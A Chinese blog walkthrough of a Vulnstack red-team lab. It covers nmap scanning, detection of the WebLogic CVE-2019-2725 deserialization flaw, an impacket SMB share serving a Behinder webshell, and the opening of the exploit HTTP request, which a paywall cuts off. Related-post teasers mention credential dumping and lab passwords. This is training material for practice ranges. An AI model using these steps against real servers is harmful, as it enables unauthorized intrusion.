[渗透测试]Vulnstack 红队(二)

最新推荐文章于 2024-10-22 18:56:00 发布
原创 最新推荐文章于 2024-10-22 18:56:00 发布 · 2.3k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #linux

本文详细介绍了利用Weblogic的CVE-2019-2725漏洞进行攻击的步骤,包括使用nmap扫描、WeblogicScan工具检测、上传webshell、执行POC以及利用冰蝎进行域渗透。在成功获取权限后,进一步通过CS工具收集域用户信息,并最终拿下域控制器。整个过程展示了网络攻防中的漏洞利用和域控接管技术。

域环境初始化

DC
IP:10.10.10.10  OS:Windows 2012(64)
应用:AD域

WEB
IP1:10.10.10.80  IP2:192.168.111.80  OS:Windows 2008(64)
应用:Weblogic 10.3.6  MSSQL 2008

PC
IP1:10.10.10.201  IP2:192.168.111.201  OS:Windows 7(32)
应用:

攻击机
IP:192.168.111.5 OS:Kali

weblogic漏洞利用

nmap扫描

nmap -p- -T5 192.168.111.80 -o web

-p- 表示扫描所有端口;

-T5 指定扫描过程使用的时序,总共有6个级别(0-5),级别越高,扫描速度越快,但也容易被防火墙或IDS检测并屏蔽掉,在网络通讯状况较好的情况下推荐使用T4。

-o 保存扫描结果到文件web

image-20220124232258229

常用端口是开放状态1433是mssql,7001我们知道是weblogic服务,因为我们前面手工开启的。

考虑weblogic服务漏洞,找到WeblogicScan工具扫一下。

工具链接

python3 WeblogicScan.py -u 192.168.111.80 -p 7001

image-20220125004053662

发现一个漏洞

CVE-2019-2725漏洞描述:这是一个Weblogic反序列化远程代码执行漏洞。部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。

启动smbserver共享文件服务

我们需要先把/root/Behinder/server/shell.jsp webshell木马程序上传weblogic服务器上。然后再使用冰蝎连接shell.jsp木马程序。

impacket-smbserver  share /root/桌面/Behinder/server &

POC:

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.111.80:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 841
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy=
最低0.47元/天 解锁文章
[渗透测试]ATT&CK实战 | Vulnstack 红队
Y4tacker的博客
12-06 2215
文章目录环境来源为什么写这篇文章配置nmap扫描启动smbserver共享文件服务打爆weblogic提权使用 procdump64+mimikatz 获取 win 用户明文密生成管理帐号密码用户凭证-连接域控服务器-反弹域控 shel参考文章 环境来源 来源于https://mp.weixin.qq.com/s/uLlWJdcAc6MmUyuruHygNA,尊重人家作者,还是自己去问人家要吧 为什么写这篇文章 给一些不必要细节删除,以及一些自己觉得细节的补充 配置 nmap扫描 常用端口是开放状态1
vulstack红队评估()
PANDA墨森的博客
06-20 1637
一、环境搭建: 1、根据作者公开的靶机信息整理: 靶场统一登录密码:1qaz@WSX 2、网络环境配置: ①Win2008双网卡模拟内外网: 外网:192.168.1.80,桥接模式与物理机相通 内网:10.10.10.80,仅主机模式 ②PC-win7只有内网: 内网:10.10.10.201,仅主机模式 ③win2012-DC只有内网: 内网:10.10.10.10,仅主机模式 启动web服务: 运行C:\Oracle\Middleware\u...
[VulnStack] ATT&CK实战系列—红队实战(
weixin_45605352的博客
08-27 1605
0x00 环境搭建 靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX 配置网卡,仅主机模式192.168.10.0网段模拟内网,192.
渗透靶场--vulnstack-红队评估实战(2)
weixin_45794666的博客
07-20 1780
vulnstack-红队评估实战(2) 环境配置 攻击者: kali 192.168.154.129 windows 192.168.154.1 靶场: WEB:对外边界服务器 10.10.10.80 192.168.154.80 PC:域成员 192.168.154.201 10.10.10.201 DC:域控 10.10.10.10 1.外网主机信息搜集 nmap 扫描web服务器端口 发现开放了80和7001 80无内容,7001weblogic版本为10.3.6.0 直接上工具获得权限代
红日安全vulnstack-ATT&CK实战系列 红队实战()
遇事不决冲冲冲
02-05 6776
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX
[渗透测试]Vulnstack 红队(一)
cosmoslin的博客
02-08 2295
官方描述 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:hongrisec@2019 域环境初始化 攻击机: kali ip:192.168.111.5 靶机: win7 外网ip:192.168.111.6 内网ip:192.168.52.14
[渗透测试]Vulnstack 红队(四)
cosmoslin的博客
04-03 664
环境配置 网络拓扑图(仅供参考) 账号信息: web: ubuntu:ubuntu win7: douser:Dotest123 DC: administrator:Test2008 ip信息: 攻击机 IP:192.168.111.5 OS:Kali 靶机 Web IP1:192.168.111.14 IP2:192.168.52.129 OS:Ubuntu DC IP:192.168.183.0/24 OS:Windows Server 2008 PC
渗透靶场--vulnstack-红队评估实战(4)
weixin_45794666的博客
07-20 882
vulnstack-红队评估实战(4) 环境配置 web服务器 ubuntu:ubuntu 内网192.168.183.131 外网192.168.154.137 web服务需要自己启动分别为s2-045、CVE-2017-12615、cve-2018-12613 sudo su ubuntu cd /home/ubuntu/Desktop/vulhub/struts2/s2-045 docker-compose up 域成员机器 douser:Dotest123 192.168.183.128 域控
牛!渗透大佬用14个部分讲明白Kail Linux渗透测试
javagty6778的博客
03-07 200
本手册致力于介绍如何使用Kail Linux对网络、系统、应用执行渗透测试渗透测试可以模拟内部或外部的恶意攻击者对网络或系统进行的 攻击。不同于漏洞评估,渗透测试包括漏洞利用阶段。因此,漏洞是存在的,而且如果不采取相应的措施将会有很大风险。在本手册中,“渗透测试人员”“攻击者”和“黑客”使用完全相同的技术 及工具评估网络和数据系统的安全性。他们之间唯一的区别是他们的目标——数据网络的安全或数据的外泄。
HTB-Tactics(Impacket工具集合 和 smb特殊共享)
weixin_58038441的博客
09-08 1016
我们讲解了Impacket工具集合 和 smb特殊共享。
Server_JDBC_Driver_20_EULA_CHS
04-06
Server_JDBC_Driver_20_EULA_CHS
psexec的简单使用
flyingleo1981的专栏
01-24 1万+
注: 新版PsExec第一次运行会弹出窗口提示是否许可执行,所以第一次运行请加命令行参数“-accepteula”(不含引号)即可通过许可,如“psexec.exe -accepteula”即可,以后执行不再需要。   cmd c:\psexec.exe \\192.168.5.X –u administrator –p 123456 –c x.exe –d ---------
内网渗透瑞士军刀-impacket工具解析(四)
失心少年
05-18 1455
前两篇我们介绍了impacket中对DCERPC协议的内容,今天我们对Windows网络中另一个应用层协议的内容进行介绍,在Windows网络中最常用的协议就是SMB协议了,SMB(Server Message Block) 是一种用于在计算机网络上共享文件、打印机和其他资源的协议。在impacket中基于SMB协议主要实现远程文件访问及DCERPC调用两大作用,在SMBv1实现了标准的SMB认证,SMBv1和SMBv2中都实现了NTLM和Kerberos的拓展认证方式。
Docker最全教程——数据库容器化(十一)
dotNET跨平台
01-13 403
终于按时完成第篇。本来准备着手讲一些实践,但是数据库部分没有讲到,部分实践会存在一些问题,于是就有了此篇以及后续——数据库容器化。本篇将从SQL Server容器化实践...
LINUX下安装Tableau Server
仅次于狼的博客
06-07 7526
硬件要求:8 核、2.0 GHz 或更高频率的处理器64 位处理器架构32 GB 内存50 GB 可用磁盘空间操作系统:Red Hat Enterprise Linux (RHEL) 7、CentOS 7 和 Oracle Linux 7。这些在本文档中统称为 RHEL 类似版本。仅支持 Ubuntu 16.04 LTS。必须具有静态 IP 地址。安装 Tableau Server 以具有 sud...
2024第届龙信杯WP思路——服务器取证
最新发布
wyp106343873的博客
10-22 2696
如果在启动容器时通过 -e​ 传递了其他自定义的环境变量,它们也会出现在 env​ 的输出中。例如,AWS 相关的环境变量、API 密钥等。​​。
Windows10下Docker安装SQL Server启动失败解决方案
xiaoyue
06-28 5137
安装方法参照微软官方文档:https://docs.microsoft.com/zh-cn/sql/linux/quickstart-install-connect-docker?view=sql-server-2017&pivots=cs1-bash 这里我将其中的两个安装命令放在这里 docker pull mcr.microsoft.com/mssql/server:2017-...
C# 删除或修改文件时提示文件被占用
热门推荐
精彩人生的博客
06-01 1万+
1, 问题:C# 中使用Image.FromFile(string path)后,提示该文件正在被另一进程使用XXX的问题,是因为对应的文件在一直调用 ,其生成的Image对象被Disponse()前都不会被解除锁定,这就造成了此问题,就是在这个图形被解锁前无法对图像进行操作(比如删除,修改等操作)。解决方案:此问题可以使用下面三个方法解决问题. 方法1:在要进行文件操作前将Image对象销毁.S...
Impacket官方使用指南
weixin_30877755的博客
04-09 3090
什么是Impacket Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。 有关某些工具的说明,请访问:https:/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值